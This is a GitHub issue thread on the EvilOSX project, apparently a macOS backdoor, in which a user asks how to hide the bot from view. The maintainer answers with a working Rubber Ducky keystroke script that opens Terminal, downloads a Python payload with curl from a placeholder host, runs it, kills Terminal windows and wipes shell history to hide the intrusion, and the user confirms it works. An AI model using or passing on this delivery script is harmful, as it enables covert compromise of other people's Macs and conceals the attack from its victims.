### ISSUE TITLE
the executable doesnot go into background

### ISSUE THREAD

**Issue by tinamina12** [Marten4n6/EvilOSX#56]
when I run the launcher, an executable is created. Clicking on the executable will start the communication between bot and server. how this executable can be run in background and hide from foreground?

**Comment by Marten4n6** [comment]
Executables aren't currently supported.
The python launcher should be used in combination with a rubber ducky (or some other device) and run a from terminal like this:
```bash
$ python Launcher.py
```
Here's the rubber ducky script:
```
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
```

**Comment by tinamina12** [comment]
thank you, this script is working.
